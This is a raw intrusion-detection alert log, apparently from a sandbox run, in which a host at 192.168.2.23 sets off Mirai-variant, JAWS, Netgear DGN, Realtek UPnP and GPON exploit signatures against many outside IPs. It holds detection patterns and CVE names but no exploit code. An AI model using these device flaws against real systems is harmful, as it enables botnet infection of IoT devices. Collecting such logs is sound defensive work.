                                                                  2024-11-28T07:28:39.596667+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235830633.57.34.2547574TCP
                                                                  2024-11-28T07:28:39.597422+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2356152105.8.172.698080TCP
                                                                  2024-11-28T07:28:39.597794+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234550862.14.141.10680TCP
                                                                  2024-11-28T07:28:39.598169+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234898018.82.105.380TCP
                                                                  2024-11-28T07:28:39.598905+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233979012.48.123.8780TCP
                                                                  2024-11-28T07:28:39.598905+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233979012.48.123.8780TCP
                                                                  2024-11-28T07:28:39.602566+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2347708203.100.248.5652869TCP
                                                                  2024-11-28T07:28:39.607302+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358938130.220.9.2127574TCP
                                                                  2024-11-28T07:28:40.512520+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342138125.6.120.1508080TCP
                                                                  2024-11-28T07:28:40.525601+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358746143.207.27.1237574TCP
                                                                  2024-11-28T07:28:40.528444+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2334340102.19.97.23480TCP
                                                                  2024-11-28T07:28:40.537912+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2357678166.5.230.9080TCP
                                                                  2024-11-28T07:28:40.540101+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354810135.245.8.1298080TCP
                                                                  2024-11-28T07:28:40.541201+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234284639.135.223.1587574TCP
                                                                  2024-11-28T07:28:40.549595+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234135450.4.239.16680TCP
                                                                  2024-11-28T07:28:40.563951+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333470159.88.243.19680TCP
                                                                  2024-11-28T07:28:40.563951+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333470159.88.243.19680TCP
                                                                  2024-11-28T07:28:40.565419+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234016495.37.33.945555TCP
                                                                  2024-11-28T07:28:40.573842+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233459834.213.210.18052869TCP
                                                                  2024-11-28T07:28:40.577482+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233359281.57.162.15980TCP
                                                                  2024-11-28T07:28:40.598256+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235679649.54.129.2080TCP
                                                                  2024-11-28T07:28:40.598256+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235679649.54.129.2080TCP
                                                                  2024-11-28T07:28:40.599106+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352562160.49.228.2305555TCP
                                                                  2024-11-28T07:28:40.599364+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2340410191.176.82.418080TCP
                                                                  2024-11-28T07:28:40.600107+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234399280.42.12.7980TCP
                                                                  2024-11-28T07:28:40.600107+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234399280.42.12.7980TCP
                                                                  2024-11-28T07:28:40.600483+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235598899.101.189.717574TCP
                                                                  2024-11-28T07:28:40.605973+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234278620.197.222.3880TCP
                                                                  2024-11-28T07:28:40.606343+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2335804124.161.90.25380TCP
                                                                  2024-11-28T07:28:40.606719+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235368825.51.224.2418080TCP
                                                                  2024-11-28T07:28:40.607089+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343542119.201.115.10480TCP
                                                                  2024-11-28T07:28:40.607089+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343542119.201.115.10480TCP
                                                                  2024-11-28T07:28:40.607461+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349990108.121.86.21380TCP
                                                                  2024-11-28T07:28:40.607461+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349990108.121.86.21380TCP
                                                                  2024-11-28T07:28:40.607833+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349576193.59.63.13780TCP
                                                                  2024-11-28T07:28:40.607833+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349576193.59.63.13780TCP
                                                                  2024-11-28T07:28:42.508780+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2343270112.166.216.148080TCP
                                                                  2024-11-28T07:28:42.511857+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235563258.156.77.13980TCP
                                                                  2024-11-28T07:28:42.512239+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233289639.231.118.708080TCP
                                                                  2024-11-28T07:28:42.524046+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348394207.182.115.645555TCP
                                                                  2024-11-28T07:28:42.536624+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355648209.157.77.20949152TCP
                                                                  2024-11-28T07:28:42.563452+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235511081.190.51.19752869TCP
                                                                  2024-11-28T07:28:42.563855+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2348712119.101.39.15152869TCP
                                                                  2024-11-28T07:28:42.564239+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336564124.217.9.35555TCP
                                                                  2024-11-28T07:28:42.564985+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234810651.212.199.2397574TCP
                                                                  2024-11-28T07:28:42.565362+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358156177.45.248.1315555TCP
                                                                  2024-11-28T07:28:42.566867+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350214135.175.75.16680TCP
                                                                  2024-11-28T07:28:42.566867+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350214135.175.75.16680TCP
                                                                  2024-11-28T07:28:42.574247+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333030185.111.88.12780TCP
                                                                  2024-11-28T07:28:42.574990+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2349372193.97.201.8980TCP
                                                                  2024-11-28T07:28:42.579065+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335576185.54.32.1247574TCP
                                                                  2024-11-28T07:28:42.580198+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354856202.215.182.21980TCP
                                                                  2024-11-28T07:28:42.580577+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236092434.103.204.9049152TCP
                                                                  2024-11-28T07:28:42.581337+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235651668.202.31.2438080TCP
                                                                  2024-11-28T07:28:42.596309+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342938191.222.250.18480TCP
                                                                  2024-11-28T07:28:42.597078+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353568102.14.30.6980TCP
                                                                  2024-11-28T07:28:42.597078+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353568102.14.30.6980TCP
                                                                  2024-11-28T07:28:42.608897+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233852017.41.138.13980TCP
                                                                  2024-11-28T07:28:42.609650+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335458125.168.142.9680TCP
                                                                  2024-11-28T07:28:43.504933+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233716029.92.118.20952869TCP
                                                                  2024-11-28T07:28:43.510411+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355954194.195.128.15949152TCP
                                                                  2024-11-28T07:28:43.514040+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340262188.234.2.18280TCP
                                                                  2024-11-28T07:28:43.514040+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340262188.234.2.18280TCP
                                                                  2024-11-28T07:28:43.519120+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234344474.23.91.7680TCP
                                                                  2024-11-28T07:28:43.519120+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234344474.23.91.7680TCP
                                                                  2024-11-28T07:28:43.521673+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234650041.43.231.17552869TCP
                                                                  2024-11-28T07:28:43.528472+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234304851.247.156.3052869TCP
                                                                  2024-11-28T07:28:43.537243+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355988126.211.100.6580TCP
                                                                  2024-11-28T07:28:43.537243+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355988126.211.100.6580TCP
                                                                  2024-11-28T07:28:43.539809+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234809438.234.0.3180TCP
                                                                  2024-11-28T07:28:43.545281+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360108206.69.196.548080TCP
                                                                  2024-11-28T07:28:43.548573+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334662120.74.8.1580TCP
                                                                  2024-11-28T07:28:43.551494+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2355180157.239.141.24452869TCP
                                                                  2024-11-28T07:28:43.551857+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355096134.181.180.828080TCP
                                                                  2024-11-28T07:28:43.592981+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2341814126.11.35.1728080TCP
                                                                  2024-11-28T07:28:43.606699+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235850228.211.70.2168080TCP
                                                                  2024-11-28T07:28:43.633718+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2344182142.207.82.4180TCP
                                                                  2024-11-28T07:28:43.799105+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2350920160.236.191.2338080TCP
                                                                  2024-11-28T07:28:43.799141+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2335996121.230.95.9980TCP
                                                                  2024-11-28T07:28:43.924490+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2338054109.85.10.608080TCP
                                                                  2024-11-28T07:28:43.924580+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235888651.218.144.208080TCP
                                                                  2024-11-28T07:28:43.930549+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2349294143.224.20.18880TCP
                                                                  2024-11-28T07:28:44.511852+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235124884.26.53.778080TCP
                                                                  2024-11-28T07:28:44.524321+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234833068.204.22.7649152TCP
                                                                  2024-11-28T07:28:44.527247+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23497168.175.157.12680TCP
                                                                  2024-11-28T07:28:44.527247+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23497168.175.157.12680TCP
                                                                  2024-11-28T07:28:44.540248+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2338022184.181.121.8480TCP
                                                                  2024-11-28T07:28:44.564416+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2340738133.234.194.978080TCP
                                                                  2024-11-28T07:28:44.607081+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235049079.122.220.1807574TCP
                                                                  2024-11-28T07:28:44.711962+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234356070.21.24.2128080TCP
                                                                  2024-11-28T07:28:44.814891+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233469082.44.161.23180TCP
                                                                  2024-11-28T07:28:44.860500+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235778454.193.111.1578080TCP
                                                                  2024-11-28T07:28:45.471757+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2335288211.126.112.1798080TCP
                                                                  2024-11-28T07:28:45.585149+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23433824.155.205.2508080TCP
                                                                  2024-11-28T07:28:45.613377+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235958479.55.247.475555TCP
                                                                  2024-11-28T07:28:46.383948+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233355236.37.163.12680TCP
                                                                  2024-11-28T07:28:46.506471+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23443107.197.38.11480TCP
                                                                  2024-11-28T07:28:46.507202+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2352712109.187.50.19280TCP
                                                                  2024-11-28T07:28:46.510809+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2350532213.49.162.780TCP
                                                                  2024-11-28T07:28:46.511180+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359058214.55.27.2518080TCP
                                                                  2024-11-28T07:28:46.511553+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235055089.195.203.1628080TCP
                                                                  2024-11-28T07:28:46.535899+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335474181.211.240.725555TCP
                                                                  2024-11-28T07:28:46.550829+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234248867.225.203.218080TCP
                                                                  2024-11-28T07:28:46.573730+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358242165.33.115.1927574TCP
                                                                  2024-11-28T07:28:46.579184+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2343288161.107.176.20080TCP
                                                                  2024-11-28T07:28:46.593344+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332836132.49.66.1578080TCP
                                                                  2024-11-28T07:28:46.606685+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234058098.43.199.21949152TCP
                                                                  2024-11-28T07:28:46.712435+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233754033.213.94.858080TCP
                                                                  2024-11-28T07:28:46.712444+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2338642161.129.248.20580TCP
                                                                  2024-11-28T07:28:46.727546+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.236029288.23.72.8580TCP
                                                                  2024-11-28T07:28:46.727631+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233658632.73.167.2088080TCP
                                                                  2024-11-28T07:28:46.805526+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2340954190.8.212.2058080TCP
                                                                  2024-11-28T07:28:47.516810+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338530115.160.25.13249152TCP
                                                                  2024-11-28T07:28:47.528027+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235856052.216.119.318080TCP
                                                                  2024-11-28T07:28:47.529126+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343916222.208.184.5080TCP
                                                                  2024-11-28T07:28:47.552075+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234252884.204.137.17574TCP
                                                                  2024-11-28T07:28:47.573135+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341040156.26.16.13680TCP
                                                                  2024-11-28T07:28:47.573135+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341040156.26.16.13680TCP
                                                                  2024-11-28T07:28:47.576042+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234208685.251.156.1358080TCP
                                                                  2024-11-28T07:28:47.576780+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346286186.90.183.1397574TCP
                                                                  2024-11-28T07:28:47.592450+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333724198.217.213.3880TCP
                                                                  2024-11-28T07:28:47.592450+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333724198.217.213.3880TCP
                                                                  2024-11-28T07:28:47.593913+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235101622.97.50.10580TCP
                                                                  2024-11-28T07:28:47.593913+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235101622.97.50.10580TCP
                                                                  2024-11-28T07:28:47.599170+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234308839.223.91.15852869TCP
                                                                  2024-11-28T07:28:47.599540+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233423859.132.118.21649152TCP
                                                                  2024-11-28T07:28:47.964100+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348332172.247.225.12949152TCP
                                                                  2024-11-28T07:28:48.608088+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235584015.190.124.5680TCP
                                                                  2024-11-28T07:28:49.555902+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235096623.180.101.1275555TCP
                                                                  2024-11-28T07:28:49.556649+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233399251.162.240.715555TCP
                                                                  2024-11-28T07:28:49.557030+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2347942221.173.12.19652869TCP
                                                                  2024-11-28T07:28:49.558136+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343088101.21.160.395555TCP
                                                                  2024-11-28T07:28:49.558511+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344136189.235.157.1480TCP
                                                                  2024-11-28T07:28:49.563626+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360018141.91.48.708080TCP
                                                                  2024-11-28T07:28:49.564014+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346224135.53.13.2118080TCP
                                                                  2024-11-28T07:28:49.579307+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342632209.204.25.7649152TCP
                                                                  2024-11-28T07:28:49.583321+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234747692.139.107.12580TCP
                                                                  2024-11-28T07:28:49.587290+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335836220.208.144.3480TCP
                                                                  2024-11-28T07:28:49.587290+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335836220.208.144.3480TCP
                                                                  2024-11-28T07:28:49.592051+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234950085.4.54.195555TCP
                                                                  2024-11-28T07:28:49.593152+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2341238142.17.17.1052869TCP
                                                                  2024-11-28T07:28:49.594617+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340682163.157.242.2247574TCP
                                                                  2024-11-28T07:28:50.363914+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2357764125.157.58.652869TCP
                                                                  2024-11-28T07:28:50.516978+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2341932222.245.158.5552869TCP
                                                                  2024-11-28T07:28:50.537237+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2350392102.205.133.13580TCP
                                                                  2024-11-28T07:28:50.569241+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2335990157.9.207.2280TCP
                                                                  2024-11-28T07:28:50.576476+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2343228117.188.27.138080TCP
                                                                  2024-11-28T07:28:50.589687+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235109427.187.181.11580TCP
                                                                  2024-11-28T07:28:50.592619+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345440121.99.176.2315555TCP
                                                                  2024-11-28T07:28:50.593006+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343188140.43.141.18980TCP
                                                                  2024-11-28T07:28:50.593006+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343188140.43.141.18980TCP
                                                                  2024-11-28T07:28:50.597548+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343928146.249.197.4249152TCP
                                                                  2024-11-28T07:28:50.598655+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234987291.224.230.6680TCP
                                                                  2024-11-28T07:28:50.600502+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23514709.158.147.2398080TCP
                                                                  2024-11-28T07:28:50.608145+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233536821.137.144.2125555TCP
                                                                  2024-11-28T07:28:50.665274+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234898018.82.105.380TCP
                                                                  2024-11-28T07:28:50.696222+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2337984184.26.224.318080TCP
                                                                  2024-11-28T07:28:50.721249+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234550862.14.141.10680TCP
                                                                  2024-11-28T07:28:50.774665+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2342174143.139.168.14880TCP
                                                                  2024-11-28T07:28:50.861934+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2338334183.240.144.88080TCP
                                                                  2024-11-28T07:28:51.516853+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2357440121.221.252.2680TCP
                                                                  2024-11-28T07:28:51.520128+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333090162.29.10.118080TCP
                                                                  2024-11-28T07:28:51.529237+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236045882.143.199.1437574TCP
                                                                  2024-11-28T07:28:51.542004+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348922107.51.18.1688080TCP
                                                                  2024-11-28T07:28:51.545338+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233700035.76.164.7380TCP
                                                                  2024-11-28T07:28:51.548632+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348890157.184.78.7380TCP
                                                                  2024-11-28T07:28:51.561027+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334172157.246.210.7180TCP
                                                                  2024-11-28T07:28:51.561027+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334172157.246.210.7180TCP
                                                                  2024-11-28T07:28:51.566486+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235701278.96.38.19749152TCP
                                                                  2024-11-28T07:28:51.568684+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352068201.26.129.2105555TCP
                                                                  2024-11-28T07:28:51.569057+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2355676148.149.231.1488080TCP
                                                                  2024-11-28T07:28:51.579604+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234290462.65.0.8649152TCP
                                                                  2024-11-28T07:28:51.590525+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342350106.105.215.917574TCP
                                                                  2024-11-28T07:28:51.601624+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233726039.5.42.3580TCP
                                                                  2024-11-28T07:28:51.601624+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233726039.5.42.3580TCP
                                                                  2024-11-28T07:28:51.743318+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2342138125.6.120.1508080TCP
                                                                  2024-11-28T07:28:51.805860+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2354810135.245.8.1298080TCP
                                                                  2024-11-28T07:28:51.821461+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234135450.4.239.16680TCP
                                                                  2024-11-28T07:28:51.940162+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233359281.57.162.15980TCP
                                                                  2024-11-28T07:28:52.510632+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2344658178.24.36.11352869TCP
                                                                  2024-11-28T07:28:52.511023+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348362123.118.217.20049152TCP
                                                                  2024-11-28T07:28:52.511388+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2355804122.36.64.22080TCP
                                                                  2024-11-28T07:28:52.513208+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235163056.179.245.1845555TCP
                                                                  2024-11-28T07:28:52.513587+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334620191.143.159.1718080TCP
                                                                  2024-11-28T07:28:52.517949+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233668828.188.164.2852869TCP
                                                                  2024-11-28T07:28:52.518329+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344932170.86.222.19480TCP
                                                                  2024-11-28T07:28:52.518329+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344932170.86.222.19480TCP
                                                                  2024-11-28T07:28:52.518694+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335872179.139.60.24649152TCP
                                                                  2024-11-28T07:28:52.549855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235248845.201.111.1387574TCP
